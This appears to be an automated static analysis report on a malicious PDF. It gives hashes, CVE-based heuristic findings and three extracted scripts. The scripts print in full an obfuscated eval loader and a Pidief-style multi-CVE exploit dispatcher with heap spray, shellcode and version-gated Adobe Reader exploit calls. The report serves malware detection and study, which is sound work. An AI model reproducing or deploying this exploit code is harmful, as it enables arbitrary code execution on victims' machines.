Malicious PDF — malware analysis report

Static analysis result for SHA-256 352f2ed884091804…

MALICIOUS

PDF

32.9 KB Created: 2010-07-25 10:32:51 First seen: 2012-10-11
MD5: 4934528bd4b0c7cd35a45ecef7e13c48 SHA-1: a828174613adafd6d844d3f865a1b047ee3f0f8d SHA-256: 352f2ed884091804649108e453b899fc64e751a523f21d99e86e1d58f8ca9631
448 Risk Score

Machine Learning

  • Nyx PDF Classifier malicious score 1.0000

Heuristics 10

  • media.newPlayer — CVE-2009-4324 critical CVE exact CVE_2009_4324
    PDF JavaScript calls media.newPlayer — CVE-2009-4324 is a use-after-free in Adobe Reader's multimedia plugin triggered by media.newPlayer(). Actively exploited as a zero-day in December 2009. (identified after JavaScript deobfuscation)
  • Collab.getIcon — CVE-2009-0927 critical CVE exact CVE_2009_0927
    PDF JavaScript calls Collab.getIcon — CVE-2009-0927 is a stack buffer overflow in Adobe Reader triggered by Collab.getIcon() with a crafted argument. Allows arbitrary code execution. (identified after JavaScript deobfuscation)
  • Collab.collectEmailInfo — CVE-2007-5659 critical CVE exact CVE_2007_5659
    PDF JavaScript calls Collab.collectEmailInfo — CVE-2007-5659 is a buffer overflow in Adobe Reader triggered by a long argument or heap-sprayed message field passed to Collab.collectEmailInfo(). Part of a series of Acrobat JS API exploits. (identified after JavaScript deobfuscation)
  • util.printf — CVE-2008-2992 critical CVE exact CVE_2008_2992
    PDF JavaScript calls util.printf() — CVE-2008-2992 is a stack buffer overflow in Adobe Reader triggered by a long format-specifier argument. Widely exploited in the wild after disclosure. (identified after JavaScript deobfuscation)
  • Pidief-style multi-CVE JavaScript dispatcher critical CVE likely PDF_PIDIEF_MULTI_CVE_DISPATCH
    A single JavaScript body branches on app.viewerVersion and invokes two or more of the canonical Reader sinks (Collab.collectEmailInfo, Collab.getIcon, util.printf with a field-width format string). This is the 2009-2010 Pidief.J multi-exploit landing template: a per-version dispatcher that fires the matching CVE chain for whichever Reader version opens the file.
  • Multi-CVE Adobe Reader JavaScript exploit kit critical PDF_ADOBE_READER_MULTI_CVE_JS_KIT
    One recovered JavaScript stage contains multiple version-gated Adobe Reader exploit branches. This is stronger evidence than independent API keywords: the PDF is selecting old Reader vulnerabilities by viewer version and running heap-sprayed Acrobat JavaScript exploit paths.
  • Generic recovered JavaScript exploit stage high PDF_GENERIC_STAGE_RECOVERY
    Bounded static stage recovery exposed hidden JavaScript through generic transforms such as null-byte collapse, percent decoding, marker replacement, arithmetic character codes, fromCharCode, numeric arrays, numeric-array minus-key decoders, alphabet-index arrays, /Producer half-difference metadata arrays, hex literals, marker-stripped Base64 literals, custom 6-bit XOR table decoders, or repeated-marker hex carriers. This rule is emitted only when the recovered stage contains exploit-like Acrobat JavaScript or shellcode markers.
  • JavaScript action low 1 related finding PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Embedded JS stream low PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.

Extracted artifacts 3

Files carved from inside the sample during analysis.

FilenameKindSourceSize
javascript_obj0001_000.js pdf-javascript-stream PDF /JS object 1 at offset 0x7F9E 788 bytes
SHA-256: 221a87b99c45cfca9fb4066d1c39cfe92bbfa6e327f43fb783c9c6df3122fbd4
Preview script
First 1,000 lines of the extracted script
osn = (function(){return this;}).call(null);
xq = new Date();
var ei='';
var fx = 'e'+(parseInt(xq.getFullYear())-1)+'a'+ei+'l';
ttio=osn[fx.replace('2009','v')];
function qn(){
	var tqx='',exry=[];
	var ei='';
	ttio('va'+ei+'r zg=th'+ei+'i'+ei+'s');
	ttio('va'+ei+'r kgk=Str'+ei+'ing.f'+ei+'romC'+ei+'harCode');
	var dxra='prod' + xq.getFullYear()+'er';
	var blfr = zg[dxra.replace('2010','uc')];
	var cuw = '' + xq.getFullYear() + ei + 'i'+ei+'t';
	var fu = 's' + cuw.replace('2010','pl');
	var oz='2010';
	oz = oz.replace(xq.getFullYear(),'');
	ttio('va'+oz+'r n' + ei + 'r=[' + blfr + oz + ']');
	var tv = nr;
	gk='le'+ei+'ng'+ei+'th';
	var spa = tv[gk] / 2;
	for (var ynm = 0; ynm < spa; ynm++) {
		tqx += kgk(tv[ynm+spa] - tv[ynm]);
	}
	return tqx;
	}
	var sour=qn();
	ttio(sour);
generic_stage_recovery_000.js deobfuscated-js generic stage recovery producer-halfdiff from raw PDF metadata at offset 0x0 3628 bytes
SHA-256: 2c47d61f7418ff7550538b5331b31f6f0c34edf95909c727eb41697410f1307d
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 11 eval/decoder/string-building token(s). Carved artifact contains 1 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
var lnoh='%u9090%u9090%u16eb%u37b9%u0001%u8b00%u2434%uf789%u3e80%u74e9%uac06%u4134%ue2aa%uc3fa%ue5e8%uffff%ua8ff%u404d%u4141%uc01f%u1dad%u4140%uc841%ucca6%u510e%u2ecc%u7015%u169a%u1210%u1212%u1212%u1212%u1214%u2912%u4045%u4141%u1714%u2912%u2f2e%u4141%u3429%u2d33%u152c%ucf29%u4f0f%ua9ad%u4109%u4141%ua911%u413d%u4141%u91be%u85c2%u2949%uae0e%u440e%ua911%u412d%u4141%u91be%u81c4%u5634%u152b%ub218%u29eb%ubf33%u57f2%u5ca9%u4141%u1141%u10a9%u4141%ube41%u1291%ubf2b%uc829%u402e%ua9fc%u4149%u4141%ua911%u417d%u4141%u91be%u7021%u2581%u11ca%uca71%u4d13%u13ca%uca55%u6933%u59f8%u4141%u7041%u70be%ued81%u207d%u433d%u616d%u8e80%u404c%ua386%uc0b1%u1abe%u0bfd%uca2b%u5103%u53ca%u9834%u05c8%u5d65%u8220%uca21%u652d%uca65%u7d04%u15ca%u3944%uab40%u0bca%uca59%u611b%uaa40%u75a2%uca08%uca75%uaf40%ube70%u8170%uedbd%u81c5%u4635%u8e80%u404c%uaa86%u7ab5%u653d%u3469%ucaa0%u651b%uaa40%uca27%u0a4d%u1bca%u405d%ucaaa%uca45%ua940%u05c8%u5d65%u8320%u4149%uaea9%ubebf%u29be%u3535%u7b31%u6e6e%u3626%u7272%u226f%u6f3b%u2222%u256e%u316f%u3129%u277e%u737c%u6776%u7c24%u4172';function sl(xvwe,mek){while(xvwe.length*2<mek){xvwe+=xvwe;}
xvwe=xvwe.substring(0,mek/2);return xvwe;}
function rly(){var quwe=new Array();var dkml=0x0c0c0c0c;var addr=0x400000;var payload=unescape(lnoh);var sc_len=payload.length*2;var mek=addr-(sc_len+0x38);var yarsp=unescape("%u9090%u9090");yarsp=sl(yarsp,mek);var count2=(dkml-0x400000)/addr;for(var count=0;count<count2;count++){quwe[count]=yarsp+payload;}
var overflow=unescape("%u0c0c%u0c0c");while(overflow.length<44952){overflow+=overflow;}
this.collabStore=Collab.collectEmailInfo({subj:"",msg:overflow});}
function printf(){nop=unescape("%u0A0A%u0A0A%u0A0A%u0A0A");var payload=unescape(lnoh);heapblock=nop+payload;bigblock=unescape("%u0A0A%u0A0A");headersize=20;spray=headersize+heapblock.length;while(bigblock.length<spray){bigblock+=bigblock;}
fillblock=bigblock.substring(0,spray);block=bigblock.substring(0,bigblock.length-spray);while(block.length+spray<0x40000){block=block+block+fillblock;}
mem=new Array();for(i=0;i<1400;i++){mem[i]=block+heapblock;}
var num=12999999999999999999888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888;util.printf("%45000f",num);}
function geticon(){var arry=new Array();if(app.doc.Collab.getIcon){var payload=unescape(lnoh);var hWq500CN=payload.length*2;var mek=0x400000-(hWq500CN+0x38);var yarsp=unescape("%u9090%u9090");yarsp=sl(yarsp,mek);var p5AjK65f=(0x0c0c0c0c-0x400000)/0x400000;for(var vqcQD96y=0;vqcQD96y<p5AjK65f;vqcQD96y++){arry[vqcQD96y]=yarsp+payload;}
var tUMhNbGw=unescape("%09");while(tUMhNbGw.length<0x4000){tUMhNbGw+=tUMhNbGw;}
tUMhNbGw="N."+tUMhNbGw;app.doc.Collab.getIcon(tUMhNbGw);}}
aPlugins=app.plugIns;var sv=parseInt(app.viewerVersion.toString().charAt(0));for(var i=0;i<aPlugins.length;i++){if(aPlugins[i].name=='EScript'){var lv=aPlugins[i].version;}}
if((lv==9)||((sv==8)&&(lv<=8.12))){geticon();}else if(lv==7.1){printf();}else if(((sv==6)||(sv==7))&&(lv<7.11)){rly();}else if((lv>=9.1)||(lv<=9.2)||(lv>=8.13)||(lv<=8.17)){function a(){util.printd('p@111111111111111111111111 : yyyy111',new Date());}
var h=app.plugIns;for(var f=0;f<h.length;f++){if(h[f].name=='EScript'){var i=h[f].version;}}
if((i>8.12)&&(i<8.2)){c=new Array();var d=unescape('%u9090%u9090');var e=unescape(lnoh);while(d.length<=0x8000){d+=d;}
d=d.substr(0,0x8000-e.length);for(f=0;f<2900;f++){c[f]=d+e;}
a();a();try{this.media.newPlayer(null);}catch(e){}
a();}}
generic_stage_recovery_001.js deobfuscated-js generic stage recovery percent-decode from raw PDF metadata at offset 0x0 3624 bytes
SHA-256: 2956eb505b6d17a732a04df44c73f2dd7b6e8b188247a993f5160fe6d77ae244
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 11 eval/decoder/string-building token(s). Carved artifact contains 1 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
var lnoh='%u9090%u9090%u16eb%u37b9%u0001%u8b00%u2434%uf789%u3e80%u74e9%uac06%u4134%ue2aa%uc3fa%ue5e8%uffff%ua8ff%u404d%u4141%uc01f%u1dad%u4140%uc841%ucca6%u510e%u2ecc%u7015%u169a%u1210%u1212%u1212%u1212%u1214%u2912%u4045%u4141%u1714%u2912%u2f2e%u4141%u3429%u2d33%u152c%ucf29%u4f0f%ua9ad%u4109%u4141%ua911%u413d%u4141%u91be%u85c2%u2949%uae0e%u440e%ua911%u412d%u4141%u91be%u81c4%u5634%u152b%ub218%u29eb%ubf33%u57f2%u5ca9%u4141%u1141%u10a9%u4141%ube41%u1291%ubf2b%uc829%u402e%ua9fc%u4149%u4141%ua911%u417d%u4141%u91be%u7021%u2581%u11ca%uca71%u4d13%u13ca%uca55%u6933%u59f8%u4141%u7041%u70be%ued81%u207d%u433d%u616d%u8e80%u404c%ua386%uc0b1%u1abe%u0bfd%uca2b%u5103%u53ca%u9834%u05c8%u5d65%u8220%uca21%u652d%uca65%u7d04%u15ca%u3944%uab40%u0bca%uca59%u611b%uaa40%u75a2%uca08%uca75%uaf40%ube70%u8170%uedbd%u81c5%u4635%u8e80%u404c%uaa86%u7ab5%u653d%u3469%ucaa0%u651b%uaa40%uca27%u0a4d%u1bca%u405d%ucaaa%uca45%ua940%u05c8%u5d65%u8320%u4149%uaea9%ubebf%u29be%u3535%u7b31%u6e6e%u3626%u7272%u226f%u6f3b%u2222%u256e%u316f%u3129%u277e%u737c%u6776%u7c24%u4172';function sl(xvwe,mek){while(xvwe.length*2<mek){xvwe+=xvwe;}
xvwe=xvwe.substring(0,mek/2);return xvwe;}
function rly(){var quwe=new Array();var dkml=0x0c0c0c0c;var addr=0x400000;var payload=unescape(lnoh);var sc_len=payload.length*2;var mek=addr-(sc_len+0x38);var yarsp=unescape("%u9090%u9090");yarsp=sl(yarsp,mek);var count2=(dkml-0x400000)/addr;for(var count=0;count<count2;count++){quwe[count]=yarsp+payload;}
var overflow=unescape("%u0c0c%u0c0c");while(overflow.length<44952){overflow+=overflow;}
this.collabStore=Collab.collectEmailInfo({subj:"",msg:overflow});}
function printf(){nop=unescape("%u0A0A%u0A0A%u0A0A%u0A0A");var payload=unescape(lnoh);heapblock=nop+payload;bigblock=unescape("%u0A0A%u0A0A");headersize=20;spray=headersize+heapblock.length;while(bigblock.length<spray){bigblock+=bigblock;}
fillblock=bigblock.substring(0,spray);block=bigblock.substring(0,bigblock.length-spray);while(block.length+spray<0x40000){block=block+block+fillblock;}
mem=new Array();for(i=0;i<1400;i++){mem[i]=block+heapblock;}
var num=12999999999999999999888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888;util.printf("E000f",num);}
function geticon(){var arry=new Array();if(app.doc.Collab.getIcon){var payload=unescape(lnoh);var hWq500CN=payload.length*2;var mek=0x400000-(hWq500CN+0x38);var yarsp=unescape("%u9090%u9090");yarsp=sl(yarsp,mek);var p5AjK65f=(0x0c0c0c0c-0x400000)/0x400000;for(var vqcQD96y=0;vqcQD96y<p5AjK65f;vqcQD96y++){arry[vqcQD96y]=yarsp+payload;}
var tUMhNbGw=unescape("	");while(tUMhNbGw.length<0x4000){tUMhNbGw+=tUMhNbGw;}
tUMhNbGw="N."+tUMhNbGw;app.doc.Collab.getIcon(tUMhNbGw);}}
aPlugins=app.plugIns;var sv=parseInt(app.viewerVersion.toString().charAt(0));for(var i=0;i<aPlugins.length;i++){if(aPlugins[i].name=='EScript'){var lv=aPlugins[i].version;}}
if((lv==9)||((sv==8)&&(lv<=8.12))){geticon();}else if(lv==7.1){printf();}else if(((sv==6)||(sv==7))&&(lv<7.11)){rly();}else if((lv>=9.1)||(lv<=9.2)||(lv>=8.13)||(lv<=8.17)){function a(){util.printd('p@111111111111111111111111 : yyyy111',new Date());}
var h=app.plugIns;for(var f=0;f<h.length;f++){if(h[f].name=='EScript'){var i=h[f].version;}}
if((i>8.12)&&(i<8.2)){c=new Array();var d=unescape('%u9090%u9090');var e=unescape(lnoh);while(d.length<=0x8000){d+=d;}
d=d.substr(0,0x8000-e.length);for(f=0;f<2900;f++){c[f]=d+e;}
a();a();try{this.media.newPlayer(null);}catch(e){}
a();}}

Open this report in the interactive analyzer, or submit your own file for analysis.